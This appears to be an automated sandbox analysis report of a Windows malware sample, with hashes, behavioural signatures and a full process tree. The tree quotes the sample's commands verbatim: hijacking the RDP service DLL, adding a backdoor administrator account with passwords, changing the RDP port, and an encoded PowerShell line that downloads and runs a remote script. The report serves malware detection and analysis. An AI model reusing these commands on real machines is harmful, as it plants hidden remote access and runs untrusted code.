Analysis
-
max time kernel
129s -
max time network
118s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
08-11-2020 17:43
Static task
static1
Behavioral task
behavioral1
Sample
1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe
Resource
win10v20201028
General
-
Target
1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe
-
Size
3.4MB
-
MD5
af944f00c218cc525ef7e56f5d634cdf
-
SHA1
532a7870f610b86ef3c1eb3f10b60a9da6152bcb
-
SHA256
1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2
-
SHA512
62b68e3651ae7a0222bc3a16442994b9c6d6505965e7b081bac168659b6eb97bbbb0cc5db260e65f4185017de62a5dc16c37347e447467db75ae062022533014
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 10 IoCs
Processes:
powershell.exeflow pid process 6 1544 powershell.exe 8 1544 powershell.exe 10 1544 powershell.exe 11 1544 powershell.exe 13 1544 powershell.exe 15 1544 powershell.exe 17 1544 powershell.exe 19 1544 powershell.exe 21 1544 powershell.exe 23 1544 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1608 icacls.exe 1544 icacls.exe 1564 icacls.exe 1816 takeown.exe 1636 icacls.exe 752 icacls.exe 1688 icacls.exe 1720 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 1436 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 1816 1816 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1608 icacls.exe 1544 icacls.exe 1564 icacls.exe 1816 takeown.exe 1636 icacls.exe 752 icacls.exe 1688 icacls.exe 1720 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Modifies service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Drops file in Windows directory 41 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1ef8cc3a-caef-4a93-8f50-36bf9cff09e2 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabB4AD.tmp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabB45B.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarB46C.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabB1F3.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f42eb7bd-594f-4a85-94f8-d7aadaccbb0e powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4375b85e-f2e3-440c-8e8f-e8a9d84203af powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ff4b1ac9-830c-4fc0-aa8c-50f75752a041 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabB233.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarB48D.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarB4AE.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_61b76f22-9cbb-4dbf-a66c-f67a5aeab97c powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarB43B.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_13ba322d-ed9c-48fa-904a-6291df14c8ff powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabB429.tmp powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YLMP62CH372KKBL4XXT3.temp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5556e11c-9298-4400-a278-a04d97882171 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f130c3de-4da1-4dcc-a963-70e01bb60be1 powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4bf588f9-5e18-42c4-abc8-0f4d8690c845 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d20b88f1-88f6-4242-8627-cb4f089a13ed powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabB193.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarB194.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarB1F4.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarB234.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarB42A.tmp powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabB48C.tmp powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_21e4b876-4879-41d3-ad31-0b96a8556e8f powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabB43A.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe -
Modifies data under HKEY_USERS 60 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d01c532602b6d601 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\25\52C64B7E powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\My powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 15 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 10 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 13 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exepowershell.exepid process 1436 powershell.exe 1436 powershell.exe 1436 powershell.exe 1436 powershell.exe 1436 powershell.exe 1544 powershell.exe 1544 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 472 1816 1816 1816 1816 -
Suspicious use of AdjustPrivilegeToken 15 IoCs
Processes:
powershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 1436 powershell.exe Token: SeRestorePrivilege 752 icacls.exe Token: SeAssignPrimaryTokenPrivilege 808 WMIC.exe Token: SeIncreaseQuotaPrivilege 808 WMIC.exe Token: SeAuditPrivilege 808 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 808 WMIC.exe Token: SeIncreaseQuotaPrivilege 808 WMIC.exe Token: SeAuditPrivilege 808 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 872 WMIC.exe Token: SeIncreaseQuotaPrivilege 872 WMIC.exe Token: SeAuditPrivilege 872 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 872 WMIC.exe Token: SeIncreaseQuotaPrivilege 872 WMIC.exe Token: SeAuditPrivilege 872 WMIC.exe Token: SeDebugPrivilege 1544 powershell.exe -
Suspicious use of WriteProcessMemory 127 IoCs
Processes:
1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exepowershell.execsc.exenet.execmd.execmd.exenet.exedescription pid process target process PID 1032 wrote to memory of 1436 1032 1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe powershell.exe PID 1032 wrote to memory of 1436 1032 1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe powershell.exe PID 1032 wrote to memory of 1436 1032 1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe powershell.exe PID 1032 wrote to memory of 1436 1032 1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe powershell.exe PID 1436 wrote to memory of 1052 1436 powershell.exe csc.exe PID 1436 wrote to memory of 1052 1436 powershell.exe csc.exe PID 1436 wrote to memory of 1052 1436 powershell.exe csc.exe PID 1052 wrote to memory of 400 1052 csc.exe cvtres.exe PID 1052 wrote to memory of 400 1052 csc.exe cvtres.exe PID 1052 wrote to memory of 400 1052 csc.exe cvtres.exe PID 1436 wrote to memory of 1816 1436 powershell.exe takeown.exe PID 1436 wrote to memory of 1816 1436 powershell.exe takeown.exe PID 1436 wrote to memory of 1816 1436 powershell.exe takeown.exe PID 1436 wrote to memory of 1636 1436 powershell.exe icacls.exe PID 1436 wrote to memory of 1636 1436 powershell.exe icacls.exe PID 1436 wrote to memory of 1636 1436 powershell.exe icacls.exe PID 1436 wrote to memory of 752 1436 powershell.exe icacls.exe PID 1436 wrote to memory of 752 1436 powershell.exe icacls.exe PID 1436 wrote to memory of 752 1436 powershell.exe icacls.exe PID 1436 wrote to memory of 1688 1436 powershell.exe icacls.exe PID 1436 wrote to memory of 1688 1436 powershell.exe icacls.exe PID 1436 wrote to memory of 1688 1436 powershell.exe icacls.exe PID 1436 wrote to memory of 1720 1436 powershell.exe icacls.exe PID 1436 wrote to memory of 1720 1436 powershell.exe icacls.exe PID 1436 wrote to memory of 1720 1436 powershell.exe icacls.exe PID 1436 wrote to memory of 1608 1436 powershell.exe icacls.exe PID 1436 wrote to memory of 1608 1436 powershell.exe icacls.exe PID 1436 wrote to memory of 1608 1436 powershell.exe icacls.exe PID 1436 wrote to memory of 1544 1436 powershell.exe icacls.exe PID 1436 wrote to memory of 1544 1436 powershell.exe icacls.exe PID 1436 wrote to memory of 1544 1436 powershell.exe icacls.exe PID 1436 wrote to memory of 1564 1436 powershell.exe icacls.exe PID 1436 wrote to memory of 1564 1436 powershell.exe icacls.exe PID 1436 wrote to memory of 1564 1436 powershell.exe icacls.exe PID 1436 wrote to memory of 900 1436 powershell.exe reg.exe PID 1436 wrote to memory of 900 1436 powershell.exe reg.exe PID 1436 wrote to memory of 900 1436 powershell.exe reg.exe PID 1436 wrote to memory of 872 1436 powershell.exe reg.exe PID 1436 wrote to memory of 872 1436 powershell.exe reg.exe PID 1436 wrote to memory of 872 1436 powershell.exe reg.exe PID 1436 wrote to memory of 1328 1436 powershell.exe reg.exe PID 1436 wrote to memory of 1328 1436 powershell.exe reg.exe PID 1436 wrote to memory of 1328 1436 powershell.exe reg.exe PID 1436 wrote to memory of 1052 1436 powershell.exe net.exe PID 1436 wrote to memory of 1052 1436 powershell.exe net.exe PID 1436 wrote to memory of 1052 1436 powershell.exe net.exe PID 1052 wrote to memory of 1184 1052 net.exe net1.exe PID 1052 wrote to memory of 1184 1052 net.exe net1.exe PID 1052 wrote to memory of 1184 1052 net.exe net1.exe PID 1436 wrote to memory of 2040 1436 powershell.exe cmd.exe PID 1436 wrote to memory of 2040 1436 powershell.exe cmd.exe PID 1436 wrote to memory of 2040 1436 powershell.exe cmd.exe PID 2040 wrote to memory of 688 2040 cmd.exe cmd.exe PID 2040 wrote to memory of 688 2040 cmd.exe cmd.exe PID 2040 wrote to memory of 688 2040 cmd.exe cmd.exe PID 688 wrote to memory of 636 688 cmd.exe net.exe PID 688 wrote to memory of 636 688 cmd.exe net.exe PID 688 wrote to memory of 636 688 cmd.exe net.exe PID 636 wrote to memory of 748 636 net.exe net1.exe PID 636 wrote to memory of 748 636 net.exe net1.exe PID 636 wrote to memory of 748 636 net.exe net1.exe PID 1436 wrote to memory of 1136 1436 powershell.exe cmd.exe PID 1436 wrote to memory of 1136 1436 powershell.exe cmd.exe PID 1436 wrote to memory of 1136 1436 powershell.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe"C:\Users\Admin\AppData\Local\Temp\1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\15t4uk3p\15t4uk3p.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2CEA.tmp" "c:\Users\Admin\AppData\Local\Temp\15t4uk3p\CSCCD8AE2460FA4BD7A52E6D591908521.TMP"4⤵
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
-
C:\Windows\system32\net.exenet start TermService5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin Ghasar4f5 /del1⤵
-
C:\Windows\system32\net.exenet.exe user updwin Ghasar4f5 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin Ghasar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin 929YDPPD /add1⤵
-
C:\Windows\system32\net.exenet.exe user updwin 929YDPPD /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin 929YDPPD /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" updwin /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" updwin /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" updwin /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin 929YDPPD1⤵
-
C:\Windows\system32\net.exenet.exe user updwin 929YDPPD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin 929YDPPD3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
